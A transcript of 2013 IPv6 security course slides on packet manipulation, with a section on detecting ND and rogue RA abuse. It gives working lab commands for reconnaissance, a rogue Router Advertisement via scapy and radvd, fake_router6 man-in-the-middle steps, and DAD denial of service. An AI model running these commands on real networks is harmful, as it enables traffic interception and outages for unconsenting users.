IPv6 0x0B Packet Manipulation

goffinet@goffinet, IPv6 Protocol, CC-BY. 11. IPv6 packet manipulation. Next-Generation Internet. François-Emmanuel Goffinet, IT trainer, 2013Q4

Description

Different types of attacks: reconnaissance, MitM, DoS, spoofing. Different scopes: exterior routing, interior routing, LAN, Internet. Different protocol weaknesses: SLAAC, ICMPv6, ND, NS, NA, RA, DNS, DHCPv6.

Transcript of IPv6 0x0B Packet Manipulation

  • goffinet@goffinet, IPv6 Protocol, CC-BY

    11. IPv6 packet manipulation

    Next-Generation Internet. François-Emmanuel Goffinet

    IT trainer, 2013Q4

  • Course outline

    1. Why IPv6?
    2. IPv6 fundamentals
    3. IPv6 packets
    4. IPv6 address representations
    5. IPv6 address types
    6. Neighbor discovery and automatic addressing
    7. IPv6 addressing plan
    8. IPv6 routing
    9. IPv6 address management (IPAM)
    10. Introduction to IPv6 security
    11. Packet manipulation
    12. IPv6 firewalling
    13. IPv6 IPsec
    14. IPv6 applications
    15. Transition methods

  • IPv6 packet manipulation

    Lesson 11

  • Attacks, weaknesses, tools

    Different types of attacks: reconnaissance, MitM, DoS, spoofing. Different scopes: exterior routing, interior routing, LAN, Internet. Different protocol weaknesses: SLAAC, ICMPv6, ND, NS, NA, RA, DNS, DHCPv6.

  • Installing the tools

    Installing THC-IPv6:

    apt-get install build-essential libpcap0.8-dev libssl-dev
    wget http://www.thc.org/releases/thc-ipv6-2.3.tar.gz
    tar xvfz thc-ipv6-2.3.tar.gz
    cd thc-ipv6-2.3/
    make
    make install

    Installing nmap, scapy and tcpdump:

    apt-get install python-scapy nmap tcpdump

    Packet capture:

    tcpdump -w IPv6.pcap -i eth0 -vv ip6

  • Reconnaissance

    nmap -6: port scans
    alive6: shows the addresses present on the segment
    passive_discovery6: passive sniffer that detects every IP address; combined with parasite6 in a switched environment
    trace6: fast traceroute with DNS resolution and tunnel detection (MTU change)

  • nmap -6

    nmap -6 -v -sT fe80::1

    Starting Nmap 6.00 ( http://nmap.org ) at 2013-12-10 21:42 CET
    Initiating ND Ping Scan at 21:42
    Scanning fe80::1 [1 port]
    Completed ND Ping Scan at 21:42, 0.04s elapsed (1 total hosts)
    Initiating System DNS resolution of 1 host. at 21:42
    Completed System DNS resolution of 1 host. at 21:42, 0.34s elapsed
    Initiating Connect Scan at 21:42
    Scanning fe80::1 [1000 ports]
    Strange error from connect (22):Invalid argument
    Completed Connect Scan at 21:42, 0.01s elapsed (1000 total ports)
    Nmap scan report for fe80::1
    Host is up (0.0015s latency).
    All 1000 scanned ports on fe80::1 are filtered
    MAC Address: 00:0C:CE:D9:23:00 (Cisco Systems)
    Read data files from: /usr/bin/../share/nmap
    Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds
               Raw packets sent: 1 (72B) | Rcvd: 1 (72B)

    Note: the "Invalid argument" from connect() and the all-filtered result come from scanning a link-local address without its zone index (fe80::1%eth0): the ND ping succeeds, but the TCP connects never leave the host.

  • alive6

    alive6 eth0
    Alive: 2001:470:cbf7:1ab:7ec3:a1ff:fe89:b96f [ICMP parameter problem]
    Alive: 2001:470:cbf7:1ab:ba27:ebff:fe59:70f3 [ICMP echo-reply]
    Alive: 2001:470:cbf7:1ab::1 [ICMP echo-reply]
    Scanned 1 address and found 3 systems alive

    Capture: http://www.cloudshark.org/captures/bed61f75bde3

  • passive_discovery6

    passive_discovery6 eth0
    Started IPv6 passive system detection (Press Control-C to end) ...
    Detected: 2001:470:cbf7:1ab:829:6ff7:4b6a:2284
    Detected: fe80::1
    Detected: 2001:470:20::2
    Detected: 2a00:1450:4007:803::1010

  • trace6

    trace6 -dt eth0 cisco.goffinet.org
    Trace6 for cisco.goffinet.org (2001:6f8:202:4db::2) with starting MTU 1500:
     1: 2001:470:cbf7:1ab::1 () - new MTU 1480 - 6in4 tunnel endpoint
     2: 2001:470:1f12:d02::1 (goffinet-2.tunnel.tserv10.par1.ipv6.he.net)
     3: 2001:470:0:7b::1 (ge2-3.core1.par1.he.net)
     4: 2001:7f8:54::149 (easynet.franceix.net)
     5: 2001:6f8:1:1:87:86:76:19 ()
     6: 2001:6f8:1:2:87:86:71:165 ()
     7: 2001:6f8:200:1003::10 (bebru01.sixxs.net) - new MTU 1280
     8: 2001:6f8:202:4db::1 (gw-1244.bru-01.be.sixxs.net)
     9: 2001:6f8:202:4db::2 (cl-1244.bru-01.be.sixxs.net) [ping reply received]

  • Other reconnaissance tools

    Alive scanning: alive6
    ICMPv6 inverse lookup: inverse_lookup6
    ICMPv6 node query: node_query6
    DNS enumeration: brute force: dnsdict6; reverse: dnsrevenum6; DNSSEC: dnssecwalk
    Local discovery: NS: detect-new-ip6; sniffing: passive_discovery6; routers: dump_router6
    Traceroute: trace6
    Helper tools: address6

  • MitM attacks

    ICMPv6 redirects: redir6, redirsniff6
    NDP: parasite6, fake_advertise6
    RA: fake_router6, fake_router26
    DHCPv6: fake_dhcps6
    DNS: fake_dns6d
    Mobility: fake_mipv6

  • DoS attacks

    flood_advertise6, flood_dhcpc6, flood_mld6, flood_mld26, flood_mldrouter6, flood_redirect6, flood_router6, flood_router26, flood_solicitate6, denial6, dos-new-ip6, exploit6, fake_advertise6, kill_router6, ndpexhaust6, ndpexhaust26, rsmurf6, sendpees6, sendpeesmp6, smurf6, thcsyn6

  • ND cache poisoning

    Neighbor cache poisoning with fake_advertise6. Start the capture. Check the cache before and after. parasite6 switches the traffic.

  • Rogue RA with scapy

    Fairly trivial in scapy; THC-IPv6 is simpler.

    scapy
    Welcome to Scapy (2.2.0)
    >>> q = IPv6()/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefix='2001:db8:bad:bad::', prefixlen=64)/ICMPv6NDOptSrcLLAddr(lladdr='00:0c:29:b7:8e:eb')
    >>> send(q)

  • Rogue RA with radvd

    apt-get install radvd

    In /etc/radvd.conf:

    interface eth0
    {
        AdvSendAdvert on;
        AdvLinkMTU 1280;
        prefix 2001:6f8:14d6:1::/64
        {
            AdvOnLink on;
            AdvAutonomous on; # enables clients to autoconf
        };
        RDNSS 2001:6f8:14d6:1::1
        {
            AdvRDNSSPreference 8;
            AdvRDNSSLifetime 3600;
        };
    };

    radvd -C /etc/radvd.conf

  • fake_router6

    In three steps:

    1. Enable routing:
       sysctl -w net.ipv6.conf.all.forwarding=1

    2. Default route:
       ip route add default via fe80::1 dev eth0

    3. Poisoning via RA:
       fake_router6 eth0 2001:470:7B6D:bad::/64

    Check the routing and neighbor tables before and after the attack. Capture the packets between the victim and the gateway. fake_router26 allows finer control.
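A detection-side counterpart to the ND cache poisoning and rogue RA labs above (fake_advertise6, the scapy and radvd advertisements, fake_router6): this is an added example, not code from the course, that parses raw ICMPv6 RA and NA messages and flags advertisements from a router or prefix outside an allow-list, plus NAs that rewrite an IP-to-MAC binding already learned, which is the "check the cache before and after" step done continuously. The packet builders, the allow-lists and the MAC addresses are constructed for the example; in practice the monitor would be fed frames from a capture such as the tcpdump shown earlier.

```python
import ipaddress, struct

ICMPV6, ND_RA, ND_NA = 58, 134, 136     # IPv6 next-header value; RA and NA ICMPv6 types
OPT_SLL, OPT_TLL, OPT_PREFIX = 1, 2, 3  # ND options: source/target link-layer address, prefix info

def ipv6(src, dst, payload):  # bare IPv6 header + ICMPv6 payload (checksum left 0: parsed, never sent)
    return (struct.pack("!IHBB", 0x60000000, len(payload), ICMPV6, 255)
            + ipaddress.IPv6Address(src).packed + ipaddress.IPv6Address(dst).packed + payload)
def lladdr_opt(kind, mac):  # ND link-layer address option: type, length 1 (= 8 bytes), 6-byte MAC
    return bytes([kind, 1]) + bytes.fromhex(mac.replace(":", ""))
def build_ra(src_ll, mac, prefix, plen=64):  # constructed RA: 16-byte header, SLL + prefix-info options
    hdr = struct.pack("!BBHBBHII", ND_RA, 0, 0, 64, 0, 1800, 0, 0)
    pio = bytes([OPT_PREFIX, 4, plen, 0xC0]) + struct.pack("!III", 86400, 14400, 0)
    return ipv6(src_ll, "ff02::1", hdr + lladdr_opt(OPT_SLL, mac) + pio + ipaddress.IPv6Address(prefix).packed)
def build_na(src, target, mac):  # constructed unsolicited NA with the Override flag (0x20000000) set
    hdr = struct.pack("!BBHI", ND_NA, 0, 0, 0x20000000) + ipaddress.IPv6Address(target).packed
    return ipv6(src, "ff02::1", hdr + lladdr_opt(OPT_TLL, mac))
def nd_options(raw):  # walk ND TLV options (length in 8-byte units); a zero length ends parsing
    opts = {}
    while len(raw) >= 8 and raw[1]:
        n = raw[1] * 8
        opts[raw[0]] = raw[2:n]
        raw = raw[n:]
    return opts

class NDMonitor:
    """Flags RAs from unknown routers or with unknown prefixes, and NAs that rewrite a learned binding."""
    def __init__(self, routers, prefixes):
        self.routers = {ipaddress.IPv6Address(r) for r in routers}    # legitimate router link-locals
        self.prefixes = {ipaddress.IPv6Network(p) for p in prefixes}  # prefixes allowed on the link
        self.cache, self.alerts = {}, []                              # ip -> MAC learned from NAs
    def feed(self, pkt):
        if len(pkt) < 64 or pkt[0] >> 4 != 6 or pkt[6] != ICMPV6:
            return  # not an IPv6/ICMPv6 packet large enough to carry an RA or NA
        src, icmp = ipaddress.IPv6Address(pkt[8:24]), pkt[40:]
        if icmp[0] == ND_RA:
            if src not in self.routers:
                self.alerts.append(f"RA from unexpected source {src}")
            pio = nd_options(icmp[16:]).get(OPT_PREFIX)
            if pio:  # body: prefixlen, flags, two lifetimes, reserved, then the 16-byte prefix
                net = ipaddress.IPv6Network((pio[14:30], pio[0]), strict=False)
                if net not in self.prefixes:
                    self.alerts.append(f"RA advertises unknown prefix {net}")
        elif icmp[0] == ND_NA:
            target = ipaddress.IPv6Address(icmp[8:24])
            mac = nd_options(icmp[24:]).get(OPT_TLL, b"").hex(":")
            if self.cache.get(target, mac) != mac:
                self.alerts.append(f"ND binding for {target} changed {self.cache[target]} -> {mac}")
            self.cache[target] = mac
```

Feeding the monitor one legitimate RA, then an RA with the 2001:db8:bad:bad::/64 prefix from an unknown link-local, then two NAs for the same target with different MACs, yields three alerts: unexpected source, unknown prefix, and a changed binding.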

  • DAD attack

    As an example, dos-new-ip6 answers every DAD attempt, so that no new interface can bring up an IPv6 address any more. Effective...

  • ndpmon: layer-2 monitoring

    Installing ndpmon: http://ndpmon.sourceforge.net/index.php?n=Doc.Installation
    Configuration: http://ndpmon.sourceforge.net/index.php?n=Doc.Configuration

  • First Hop Security

    According to the Cisco document "Implementing First Hop Security":

    IPv6 First-Hop Security Binding Table
    IPv6 Device Tracking
    IPv6 Port-Based Access List Support
    IPv6 Global Policies
    IPv6 RA Guard
    IPv6 ND Inspection

    Secure Neighbor Discovery in IPv6
    IPv6 Neighbor Discovery Trust Models and Threats
    SeND Protocol
    SeND Deployment Models
    Single CA Model

  • Rights

    IPv6 Protocol by [email protected] is made available under the terms of the Creative Commons Attribution 4.0 International license.